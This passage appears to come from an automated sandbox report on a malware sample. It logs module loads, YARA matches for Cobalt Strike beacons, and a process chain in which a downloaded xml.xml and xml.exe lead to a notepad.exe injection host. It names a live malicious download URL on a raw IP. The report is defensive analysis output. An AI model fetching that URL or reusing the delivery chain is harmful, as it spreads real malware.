      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sppc.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: vcruntime140.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: wininet.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: version.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: urlmon.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: msvcp140.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: iertutil.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: srvcli.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: netutils.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: uxtheme.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: appvisvsubsystems32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: vcruntime140.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: c2r32.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wininet.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: sspicli.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: iertutil.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: wldp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: profapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXESection loaded: apphelp.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: apphelp.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: msvcp140.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: vcruntime140.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: vcruntime140_1.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\Downloads\xml.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: winnsi.dll
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
      Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
      Source: classification engineClassification label: mal100.troj.evad.win@112/227@12/122
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\ff832fe5-5854-443c-a430-eabe8a426ebb.tmp
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
      Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2E90A9110A4AC96B.TMP
      Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.ini
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://213.109.202.222/download/xml.xml
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1956,i,12291376917359172718,11941003201960649929,262144 /prefetch:3
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe cookie_exporter.exe --cookie-json=1148
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Users\user\Downloads\xml.exe "C:\Users\user\Downloads\xml.exe"
      Source: C:\Users\user\Downloads\xml.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Downloads\xml.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
